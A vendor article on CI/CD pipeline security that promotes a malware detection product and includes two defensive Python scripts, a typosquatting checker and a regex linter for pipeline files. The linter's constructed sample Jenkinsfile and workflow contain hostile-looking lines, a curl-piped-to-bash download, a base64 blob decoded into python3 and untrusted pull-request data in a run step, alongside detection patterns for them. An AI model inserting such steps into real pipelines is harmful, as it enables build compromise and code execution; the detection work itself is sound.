08 July 2025

CI/CD Security: Advanced Malware Detection for DevOps Pipelines with GLIMPS Malware

Articles

Attackers keep finding footholds where they are least expected. In recent years, attention has turned to a previously overlooked target: the CI/CD pipeline. Widely used by developers to automate software delivery, this fast-moving process often rests on weakly secured foundations, and it offers an attacker several points in the development cycle at which to insert malicious code.

This lack of control, combined with the large-scale import of third-party dependencies, is what makes the pipeline a blind spot in corporate security strategies.

Why does the development phase, and the CI/CD pipeline in particular, remain so poorly secured despite its central role in building software? How do attackers get into it? And how can proactive detection be added without disrupting a DevOps model built on continuous deployment?

Insights and answers from our experts.

CI/CD: Automating Development to Meet Business Requirements

With the spread of cloud computing and microservices, software development has scaled up considerably. Once confined to specialist software vendors, the DevOps approach is now commonplace in companies of every kind – banks, telecom operators, manufacturers, public sector bodies – that build their own business tools in-house.

As Timothée Billet, Sales Director at GLIMPS, emphasizes: “Customer portals, extranets, business APIs, mobile applications, internal automation: software has become an essential building block of business activity, regardless of company size or sector.”

This shift has been made possible largely by the CI/CD (Continuous Integration / Continuous Delivery) model, which automates the stages of the delivery cycle: code validation, testing, compilation, packaging and deployment to production, with little or no human intervention along the way.

According to a 2024 JetBrains report, 50% of developers regularly use CI/CD tools. This widespread adoption has been accompanied by a shift in where, and whether, security controls are applied.

Builds rely on external components: open source libraries and third-party scripts are pulled automatically from public registries such as npm, PyPI or Maven at build time. This automation makes delivery smoother, but it also removes many of the manual checks that developers used to perform during validation.

What flows through the CI/CD pipeline is therefore not always visible or controlled. And the smoother the integration, the greater the exposure. This gap between technical performance and security control is now at the heart of new threats facing the development chain.

 


The CI/CD Pipeline is a Blind Spot in Software Security

Designed first and foremost to speed up development cycles, the CI/CD pipeline rarely includes security controls of its own. In most organizations, controls are applied at the gate to production or on user workstations. But malicious code can enter much earlier.

The modus operandi is simple and well known: an attacker publishes a malicious package under a name that closely resembles a legitimate one (typosquatting) and waits for a developer, or an automated build, to pull it in by mistake. “An approach already used in mobile app stores. This was the case with ‘Deepseeek’ – a fake Python library impersonating ‘Deepseek’, the Chinese-origin LLM published in January 2025. Once installed, this fake library exfiltrated the user’s local data,” explains Alexis Peru, Solution Architect at GLIMPS.
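A concrete check against the typosquatting pattern just described, and against the earlier point that dependencies are pulled from public registries with no manual review. This is an added example written for this article; it is not GLIMPS code and does not describe how GLIMPS Malware Detect works. Before the pipeline runs `pip install`, every project name in the requirements file is compared with a team-maintained approved list; an exact match passes, a near miss (one edit or one transposed pair away from an approved name, measured with the optimal-string-alignment variant of Damerau-Levenshtein distance) fails the build, and anything else is routed to human review. The approved list, the requirements file, the threshold and the verdict names are all constructed for the example.

```python
import re
from typing import Dict, List, Optional


def normalize(name: str) -> str:
    """PEP 503 normalization: lower-case and collapse runs of '-', '_' and '.' to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def damerau_levenshtein(a: str, b: str) -> int:
    """Optimal string alignment distance: insert, delete, substitute and adjacent
    transposition each cost 1, so 'reqeusts' is 1 away from 'requests'."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[len(a)][len(b)]


def parse_requirements(text: str) -> List[str]:
    """Extract project names from requirements.txt lines, ignoring blank lines,
    comments and option lines such as -r or --index-url."""
    names = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith("-"):
            continue
        m = re.match(r"[A-Za-z0-9][A-Za-z0-9._-]*", line)
        if m:
            names.append(m.group(0))
    return names


def check_dependencies(requirements_text: str, approved: List[str],
                       max_distance: int = 2) -> List[Dict[str, Optional[str]]]:
    """Classify each requested dependency: 'approved' (exact normalized match),
    'suspicious' (within max_distance of an approved name, the typosquatting
    pattern) or 'unknown' (not on the list and not a near miss: needs review)."""
    approved_norm = {normalize(p): p for p in approved}
    findings = []
    for raw in parse_requirements(requirements_text):
        norm = normalize(raw)
        if norm in approved_norm:
            findings.append({"name": raw, "verdict": "approved", "closest": approved_norm[norm]})
            continue
        closest, best = None, None
        for cand_norm, cand in approved_norm.items():
            dist = damerau_levenshtein(norm, cand_norm)
            if best is None or dist < best:
                closest, best = cand, dist
        if best is not None and best <= max_distance:
            findings.append({"name": raw, "verdict": "suspicious", "closest": closest})
        else:
            findings.append({"name": raw, "verdict": "unknown", "closest": None})
    return findings


def has_suspicious(findings: List[Dict[str, Optional[str]]]) -> bool:
    """Gate decision: True means the build must fail instead of installing."""
    return any(f["verdict"] == "suspicious" for f in findings)


# Constructed sample input (not from any real project): an approved list and a requirements file.
APPROVED = ["requests", "deepseek", "numpy", "urllib3"]
REQUIREMENTS = """\
# constructed requirements.txt for the example
requests==2.32.3
Deepseeek            # one extra 'e': the PyPI typosquat named in the article
numpy>=1.26
reqeusts==2.31.0     # adjacent transposition of 'requests'
urllib3
pyyaml               # not on the approved list and not a near miss: review, do not block
"""

if __name__ == "__main__":
    results = check_dependencies(REQUIREMENTS, APPROVED)
    for f in results:
        print(f"{f['verdict']:10} {f['name']:12} closest approved: {f['closest']}")
    raise SystemExit(1 if has_suspicious(results) else 0)
```

Two caveats from practice: on very short names a distance of 2 produces false positives (unrelated small packages are often two letters apart), so teams usually drop `max_distance` to 1 below about six characters or rely on the allow-list alone; and an exact allow-list match says nothing about the package contents, which is why a name check like this belongs in front of, not instead of, analysis of the downloaded artifact itself.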

Other attacks target the pipeline directly. Malicious steps can be injected into CI/CD configuration files, such as those of Jenkins¹, so that arbitrary code runs during the build or deployment stage.

These scenarios are not theoretical. Palo Alto Networks’ Unit 42 red team demonstrated a complete pipeline compromise in an exercise modelled on the SolarWinds Orion supply chain attack. Their tests exposed structural weaknesses: no verification of artifacts, no traceability, and implicit trust in every element of the workflow.

¹Source: xygeni.io
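The configuration-injection scenario above, a malicious step planted in a pipeline definition so that arbitrary code runs at build time, can be caught before merge by linting the pipeline definition itself as a required check on every change to it. The following is an added example written for this article, not GLIMPS, xygeni or Unit 42 code. The rule set and both sample configurations are constructed for illustration: the `${{ github.event.* }}` rule reflects GitHub's published guidance on script injection through event data expanded inside `run:` steps, and the 40-hex-character check reflects the common advice to pin actions to a commit SHA rather than a mutable tag or branch.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class Finding:
    source: str
    line_no: int
    rule: str
    severity: str
    line: str


# Each rule is one regex applied per line. Constructed for this example; not an exhaustive ruleset.
RULES: List[Tuple[str, str, re.Pattern]] = [
    # remote content piped straight into a shell, or `bash <(curl ...)`
    ("download-and-execute", "high", re.compile(
        r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z|da)?sh\b|\b(ba|z)?sh\s+<\(\s*(curl|wget)\b")),
    # an opaque base64 blob decoded and handed to an interpreter
    ("decode-and-execute", "high", re.compile(
        r"base64\s+(-d|--decode)\b.*\|\s*(sudo\s+)?(sh|bash|python\d?|perl|node)\b")),
    # attacker-controlled GitHub event fields expanded inside a run: step (script injection)
    ("untrusted-event-data-in-run", "high", re.compile(
        r"\$\{\{\s*github\.event\.(issue|pull_request|comment|review|head_commit)\."
        r"[\w.]*(title|body|message|head\.ref|ref)\b")),
    # an action referenced by a tag or branch instead of a full 40-hex commit SHA
    ("mutable-action-ref", "medium", re.compile(
        r"^\s*-?\s*uses:\s*[^@\s]+@(?![0-9a-f]{40}\b)\S+")),
]


def scan_pipeline_config(text: str, source: str) -> List[Finding]:
    """Run every rule over every non-comment line of a pipeline definition."""
    findings: List[Finding] = []
    for no, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith(("#", "//")):
            continue  # whole-line comments never execute
        for rule, severity, pattern in RULES:
            if pattern.search(line):
                findings.append(Finding(source, no, rule, severity, stripped))
    return findings


def should_block(findings: List[Finding], block_on=("high",)) -> bool:
    """Gate decision: fail the check on any finding at a blocking severity."""
    return any(f.severity in block_on for f in findings)


# Constructed sample inputs (not real projects): a Jenkinsfile and a GitHub Actions workflow.
JENKINSFILE = """\
pipeline {
  agent any
  stages {
    stage('Build') {
      steps {
        sh 'make build'
        sh 'curl -sSL https://example.invalid/setup.sh | bash'
      }
    }
    stage('Deploy') {
      steps {
        sh 'echo aW1wb3J0IG9zCg== | base64 -d | python3'
      }
    }
  }
}
"""

WORKFLOW = """\
name: ci
on: [pull_request_target]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: some-org/setup-tool@main
      - run: echo "Reviewing ${{ github.event.pull_request.title }}"
      - run: make test
"""

if __name__ == "__main__":
    all_findings = (scan_pipeline_config(JENKINSFILE, "Jenkinsfile")
                    + scan_pipeline_config(WORKFLOW, ".github/workflows/ci.yml"))
    for f in all_findings:
        print(f"{f.source}:{f.line_no} [{f.severity}] {f.rule}: {f.line}")
    raise SystemExit(1 if should_block(all_findings) else 0)
```

Regex rules of this kind are a cheap first gate, not a substitute for analysis: an attacker who controls the pipeline definition can split a command across variables or fetch the payload from a step that looks benign. The check earns its place by catching the common, noisy patterns and by making every edit to the pipeline definition itself reviewable, which is exactly the traceability the Unit 42 exercise found missing.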

GLIMPS Malware Detect: A Tailored Response to CI/CD Risks

Faced with these new forms of software compromise, proactive detection becomes essential. This is where GLIMPS Malware Detect fits in – a solution designed to integrate malware detection directly into CI/CD pipelines without disrupting the development cycle.

The strength of GLIMPS Malware Detect lies in its fully automated operation. Once the API is integrated into a pipeline – GitHub Actions, GitLab CI, Jenkins, or any other orchestrator – every file, library, or generated artifact can be analyzed in real time. The objective is clear: detect any attempt to introduce malicious code as soon as it enters the pipeline, before it is deployed or integrated into a final product.

Unlike traditional security tools, which are often designed for production or endpoints, GLIMPS integrates upstream, into the development processes themselves. This makes it possible to block compromised files well before they have any chance of reaching a production environment.

The analysis relies on a proprietary engine, combining machine learning algorithms and binary analysis, capable of identifying known and unknown malware, as well as suspicious behaviors, even without signatures. Integration is done through Python or Go libraries, available as open source on GLIMPS’s public GitHub repository, facilitating adoption even in highly agile DevOps environments.

Beyond detection, GLIMPS guarantees data sovereignty and confidentiality: analyzed files are neither stored nor shared. Analysis can be hosted in France, or directly in the client’s infrastructure, ensuring complete isolation – a determining factor in sensitive sectors.

GLIMPS Secures the CI/CD Pipeline

As CI/CD pipelines become indispensable in software development, their security remains largely underestimated. By integrating malware detection at the heart of the pipeline itself, GLIMPS Malware Detect makes it possible to secure software deliveries without slowing down deployment or innovation.

Want to test GLIMPS integration in your CI/CD pipeline? Discover our ready-to-use libraries on GitHub or contact our team for a personalized demonstration.